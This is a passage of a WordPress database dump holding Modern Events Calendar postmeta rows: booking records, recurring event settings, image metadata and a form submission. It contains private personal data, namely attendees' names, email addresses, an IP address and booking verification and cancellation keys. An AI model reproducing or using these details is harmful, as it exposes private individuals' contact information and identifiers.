09:59:03'),(189318,268866,'mec_all_dates','a:0:{}'),(189319,268866,'mec_other_dates','a:0:{}'),(189320,268866,'mec_attention_time','1691922600:1691926200'),(189321,268866,'mec_attention_time_start','1691922600'),(189322,268866,'mec_attention_time_end','1691926200'),(189323,268866,'mec_book_date_submit','20230802095903'),(189324,268866,'mec_booking_location','129'),(189325,268866,'mec_ticket_price_1','0'),(189326,268866,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:5:\"Chris\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"76.130.120.198\";}}'),(189327,268866,'mec_price','0'),(189328,268866,'mec_payable','0'),(189329,268866,'mec_local_timezone','America/Denver'),(189382,268869,'_wp_attached_file','2023/08/soul-travel-2-souls-4.jpg'),(189383,268869,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:820;s:6:\"height\";i:446;s:4:\"file\";s:33:\"2023/08/soul-travel-2-souls-4.jpg\";s:8:\"filesize\";i:92089;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"soul-travel-2-souls-4-350x190.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:190;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22229;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"soul-travel-2-souls-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11763;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"soul-travel-2-souls-4-768x418.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:418;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:64897;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:33:\"soul-travel-2-souls-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22707;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:33:\"soul-travel-2-souls-4-500x446.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:446;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46512;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:33:\"soul-travel-2-souls-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36898;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:33:\"soul-travel-2-souls-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28388;}s:8:\"tileview\";a:5:{s:4:\"file\";s:33:\"soul-travel-2-souls-4-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24908;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"13\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:11:\"NIKON D5000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1400544000\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(189334,268867,'mec_transaction_id','GES73920'),(189335,268867,'mec_gateway','MEC_gateway_free'),(189336,268867,'mec_gateway_label','Free'),(189337,268867,'mec_user_id','1000021'),(189338,268867,'mec_verified','1'),(189339,268867,'mec_verification_key','9ac9f5d09f1e36593e8801900187c1cb'),(189340,268867,'mec_cancellation_key','735c44f6b0432b8726c1403402a56e94'),(189341,268867,'mec_confirmed','1'),(189342,268867,'mec_event_id','268863'),(189343,268867,'mec_date','1691922600:1691926200'),(189344,268867,'mec_ticket_id',',1,'),(189345,268867,'mec_booking_time','2023-08-02 10:08:54'),(189346,268867,'mec_all_dates','a:0:{}'),(189347,268867,'mec_other_dates','a:0:{}'),(189348,268867,'mec_attention_time','1691922600:1691926200'),(189349,268867,'mec_attention_time_start','1691922600'),(189350,268867,'mec_attention_time_end','1691926200'),(189351,268867,'mec_book_date_submit','20230802100854'),(189352,268867,'mec_booking_location','129'),(189353,268867,'mec_ticket_price_1','0'),(189354,268867,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:6:\"Chris2\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"76.130.120.198\";}}'),(189355,268867,'mec_price','0'),(189356,268867,'mec_payable','0'),(189357,268867,'mec_local_timezone','America/Denver'),(189358,268868,'mec_transaction_id','NQO96287'),(189359,268868,'mec_gateway','MEC_gateway_free'),(189360,268868,'mec_gateway_label','Free'),(189361,268868,'mec_user_id','1000021'),(189362,268868,'mec_verified','1'),(189363,268868,'mec_verification_key','33f4b03ab51386f07220f15bce4ddc8e'),(189364,268868,'mec_cancellation_key','fdd474ea50189cf70b972653d14b96f6'),(189365,268868,'mec_confirmed','1'),(189366,268868,'mec_event_id','268863'),(189367,268868,'mec_date','1691922600:1691926200'),(189368,268868,'mec_ticket_id',',1,'),(189369,268868,'mec_booking_time','2023-08-02 10:31:54'),(189370,268868,'mec_all_dates','a:0:{}'),(189371,268868,'mec_other_dates','a:0:{}'),(189372,268868,'mec_attention_time','1691922600:1691926200'),(189373,268868,'mec_attention_time_start','1691922600'),(189374,268868,'mec_attention_time_end','1691926200'),(189375,268868,'mec_book_date_submit','20230802103154'),(189376,268868,'mec_booking_location','129'),(189377,268868,'mec_ticket_price_1','0'),(189378,268868,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"Choll.03@comcast.net\";s:4:\"name\";s:6:\"Chris3\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"76.130.120.198\";}}'),(189379,268868,'mec_price','0'),(189380,268868,'mec_payable','0'),(189381,268868,'mec_local_timezone','America/Denver'),(189394,266063,'folders_file_replaced','1690995018'),(189395,266063,'passster_area_shortcode',''),(189396,268870,'_field_224','micah'),(189397,268870,'_field_225','ingram'),(189398,268870,'_field_226','musickidd28@gmail.com'),(189399,268870,'_field_227','CO'),(189400,268870,'_field_228','US'),(189401,268870,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(189402,268870,'_form_id','21'),(189403,268870,'_seq_num','180'),(189418,268871,'mec_end_day_seconds','70200'),(189419,268871,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-09\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-09\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(189420,268871,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(189421,268871,'mec_certain_weekdays','a:0:{}'),(189422,268871,'mec_allday','0'),(189423,268871,'mec_hide_time','0'),(189424,268871,'mec_hide_end_time','0'),(189425,268871,'mec_comment',''),(189426,268871,'mec_repeat_status','0'),(189427,268871,'mec_repeat_type',''),(189428,268871,'mec_repeat_interval','1'),(189429,268871,'mec_repeat_end',''),(189430,268871,'mec_repeat_end_at_occurrences',''),(189431,268871,'mec_repeat_end_at_date',''),(189432,268871,'mec_advanced_days','a:0:{}'),(189433,268871,'mec_in_days',''),(189434,268871,'mec_not_in_days',''),(189435,268871,'mec_hourly_schedules','a:0:{}'),(189436,268871,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(189437,268871,'mec_tickets','a:0:{}'),(189438,268871,'mec_fees_global_inheritance','1'),(189439,268871,'mec_fees','a:0:{}'),(189440,268871,'mec_ticket_variations_global_inheritance','1'),(189441,268871,'mec_ticket_variations','a:0:{}'),(189442,268871,'mec_reg_fields_global_inheritance','1'),(189443,268871,'mec_reg_fields','a:0:{}'),(189444,268871,'mec_op','a:0:{}'),(189445,268871,'mec_event_date_submit','20210422105713'),(189446,268871,'mec_read_more',''),(189447,268871,'mec_more_info',''),(189448,268871,'mec_more_info_title',''),(189449,268871,'mec_more_info_target','_self'),(189450,268871,'mec_cost',''),(189451,268871,'mec_currency','a:0:{}'),(189452,268871,'mec_additional_organizer_ids','a:0:{}'),(189453,268871,'mec_additional_location_ids','a:0:{}'),(189454,268871,'one_occurrence','0'),(189455,268871,'mec_timezone','global'),(189456,268871,'mec_countdown_method','global'),(189457,268871,'mec_public','1'),(189458,268871,'mec_bfixed_fields','a:0:{}'),(189459,268871,'mec_fields','a:0:{}'),(189460,268871,'mec_event_status','EventScheduled'),(189461,268871,'mec_moved_online_link',''),(189462,268871,'mec_cancelled_reason',''),(189463,268871,'mec_display_cancellation_reason_in_single_page',''),(189464,268871,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(189465,268871,'passster_activate_global_protection',''),(189466,268871,'passster_activate_protection',''),(189467,268871,'passster_protection_type','password'),(189468,268871,'_wp_old_date','2022-01-18'),(189469,268871,'boldgrid_in_page_containers','1'),(189470,268871,'_dp_original','266827'),(189471,268871,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(189472,268871,'passster_area_shortcode',''),(189473,268871,'mec_cost_auto_calculate','0'),(189474,268871,'mec_style_per_event','global'),(189475,268871,'mec_trailer_url',''),(189476,268871,'mec_trailer_title',''),(189477,268871,'mec_start_datetime','2023-08-09 06:30 PM'),(189478,268871,'mec_end_datetime','2023-08-09 07:30 PM'),(189479,268871,'mec_sequence','1'),(189480,268871,'mec_event_gallery','a:0:{}'),(189481,268871,'mec_related_events','a:0:{}'),(189482,268871,'mec_banner','a:0:{}'),(189483,268871,'_edit_lock','1691155017:15'),(189484,268871,'_edit_last','15'),(189485,268871,'_thumbnail_id','268872'),(189486,268872,'_wp_attached_file','2023/08/Dreams2.webp'),(189487,268872,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:20:\"2023/08/Dreams2.webp\";s:8:\"filesize\";i:16256;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Dreams2-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6564;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Dreams2-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2840;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"Dreams2-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5944;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:20:\"Dreams2-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10674;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"Dreams2-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9588;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"Dreams2-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7624;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"Dreams2-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6370;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(189488,268874,'mec_end_time_hour','8'),(189489,268874,'mec_end_date','2023-08-15'),(189490,268874,'mec_start_time_hour','7'),(189491,268874,'mec_start_time_minutes','0'),(189492,268874,'mec_start_time_ampm','PM'),(189493,268874,'mec_start_day_seconds','68400'),(189494,268874,'mec_start_date','2023-08-15'),(189495,268874,'mec_organizer_id','1'),(189496,268874,'mec_dont_show_map','0'),(189497,268874,'mec_location_id','165'),(189498,268874,'mec_color',''),(189499,268874,'mec_end_time_ampm','PM'),(189500,268874,'mec_end_time_minutes','0'),(189501,268874,'protect_children',''),(189502,268874,'mec_end_day_seconds','72000'),(189503,268874,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-15\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-15\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(189504,268874,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(189505,268874,'mec_certain_weekdays','a:0:{}'),(189506,268874,'mec_allday','0'),(189507,268874,'mec_hide_time','0'),(189508,268874,'mec_hide_end_time','0'),(189509,268874,'mec_comment',''),(189510,268874,'mec_repeat_status','0'),(189511,268874,'mec_repeat_type',''),(189512,268874,'mec_repeat_interval','1'),(189513,268874,'mec_repeat_end',''),(189514,268874,'mec_repeat_end_at_occurrences',''),(189515,268874,'mec_repeat_end_at_date',''),(189516,268874,'mec_advanced_days','a:0:{}'),(189517,268874,'mec_in_days',''),(189518,268874,'mec_not_in_days',''),(189519,268874,'mec_hourly_schedules','a:0:{}'),(189520,268874,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(189521,268874,'mec_tickets','a:0:{}'),(189522,268874,'mec_fees_global_inheritance','1'),(189523,268874,'mec_fees','a:0:{}'),(189524,268874,'mec_ticket_variations_global_inheritance','1'),(189525,268874,'mec_ticket_variations','a:0:{}'),(189526,268874,'mec_reg_fields_global_inheritance','1'),(189527,268874,'mec_reg_fields','a:0:{}'),(189528,268874,'mec_op','a:0:{}'),(189529,268874,'mec_event_date_submit','20210422105713'),(189530,268874,'mec_read_more',''),(189531,268874,'mec_more_info',''),(189532,268874,'mec_more_info_title',''),(189533,268874,'mec_more_info_target','_self'),(189534,268874,'mec_cost',''),(189535,268874,'mec_currency','a:0:{}'),(189536,268874,'mec_additional_organizer_ids','a:0:{}'),(189537,268874,'mec_additional_location_ids','a:0:{}'),(189538,268874,'one_occurrence','0'),(189539,268874,'mec_timezone','global'),(189540,268874,'mec_countdown_method','global'),(189541,268874,'mec_public','1'),(189542,268874,'mec_bfixed_fields','a:0:{}'),(189543,268874,'mec_fields','a:0:{}'),(189544,268874,'mec_event_status','EventScheduled'),(189545,268874,'mec_moved_online_link',''),(189546,268874,'mec_cancelled_reason',''),(189547,268874,'mec_display_cancellation_reason_in_single_page',''),(189548,268874,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(189549,268874,'passster_activate_global_protection',''),(189550,268874,'passster_activate_protection',''),(189551,268874,'passster_protection_type','password'),(189552,268874,'_wp_old_date','2022-01-18'),(189553,268874,'boldgrid_in_page_containers','1'),(189554,268874,'_dp_original','266827'),(189555,268874,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(189556,268874,'passster_area_shortcode',''),(189557,268874,'mec_cost_auto_calculate','0'),(189558,268874,'mec_style_per_event','global'),(189559,268874,'mec_trailer_url',''),(189560,268874,'mec_trailer_title',''),(189561,268874,'mec_start_datetime','2023-08-15 07:00 PM'),(189562,268874,'mec_end_datetime','2023-08-15 08:00 PM'),(189563,268874,'mec_sequence','4'),(189564,268874,'mec_event_gallery','a:0:{}'),(189565,268874,'mec_related_events','a:0:{}'),(189566,268874,'mec_banner','a:0:{}'),(189567,268874,'_edit_lock','1691155594:15'),(189568,268874,'_edit_last','15'),(189569,268874,'_thumbnail_id','268875'),(189570,268875,'_wp_attached_file','2023/08/SpiritualCity.webp'),(189571,268875,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:26:\"2023/08/SpiritualCity.webp\";s:8:\"filesize\";i:20972;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"SpiritualCity-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5996;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"SpiritualCity-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2836;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"SpiritualCity-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6596;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:26:\"SpiritualCity-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12388;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"SpiritualCity-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10258;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"SpiritualCity-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7688;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"SpiritualCity-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7438;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(189572,268876,'mec_end_time_hour','8'),(189573,268876,'mec_end_date','2023-08-17'),(189574,268876,'mec_start_time_hour','7'),(189575,268876,'mec_start_time_minutes','0'),(189576,268876,'mec_start_time_ampm','PM'),(189577,268876,'mec_start_day_seconds','68400'),(189578,268876,'mec_start_date','2023-08-17'),(189579,268876,'mec_organizer_id','1'),(189580,268876,'mec_dont_show_map','0'),(189581,268876,'mec_location_id','171'),(189582,268876,'mec_color',''),(189583,268876,'mec_end_time_ampm','PM'),(189584,268876,'mec_end_time_minutes','0'),(189585,268876,'protect_children',''),(189586,268876,'mec_end_day_seconds','72000'),(189587,268876,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-17\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-17\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(189588,268876,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(189589,268876,'mec_certain_weekdays','a:0:{}'),(189590,268876,'mec_allday','0'),(189591,268876,'mec_hide_time','0'),(189592,268876,'mec_hide_end_time','0'),(189593,268876,'mec_comment',''),(189594,268876,'mec_repeat_status','0'),(189595,268876,'mec_repeat_type',''),(189596,268876,'mec_repeat_interval','1'),(189597,268876,'mec_repeat_end',''),(189598,268876,'mec_repeat_end_at_occurrences',''),(189599,268876,'mec_repeat_end_at_date',''),(189600,268876,'mec_advanced_days','a:0:{}'),(189601,268876,'mec_in_days',''),(189602,268876,'mec_not_in_days',''),(189603,268876,'mec_hourly_schedules','a:0:{}'),(189604,268876,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(189605,268876,'mec_tickets','a:0:{}'),(189606,268876,'mec_fees_global_inheritance','1'),(189607,268876,'mec_fees','a:0:{}'),(189608,268876,'mec_ticket_variations_global_inheritance','1'),(189609,268876,'mec_ticket_variations','a:0:{}'),(189610,268876,'mec_reg_fields_global_inheritance','1'),(189611,268876,'mec_reg_fields','a:0:{}'),(189612,268876,'mec_op','a:0:{}'),(189613,268876,'mec_event_date_submit','20210422105713'),(189614,268876,'mec_read_more',''),(189615,268876,'mec_more_info',''),(189616,268876,'mec_more_info_title',''),(189617,268876,'mec_more_info_target','_self'),(189618,268876,'mec_cost',''),(189619,268876,'mec_currency','a:0:{}'),(189620,268876,'mec_additional_organizer_ids','a:0:{}'),(189621,268876,'mec_additional_location_ids','a:0:{}'),(189622,268876,'one_occurrence','0'),(189623,268876,'mec_timezone','global'),(189624,268876,'mec_countdown_method','global'),(189625,268876,'mec_public','1'),(189626,268876,'mec_bfixed_fields','a:0:{}'),(189627,268876,'mec_fields','a:0:{}'),(189628,268876,'mec_event_status','EventScheduled'),(189629,268876,'mec_moved_online_link',''),(189630,268876,'mec_cancelled_reason',''),(189631,268876,'mec_display_cancellation_reason_in_single_page',''),(189632,268876,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"P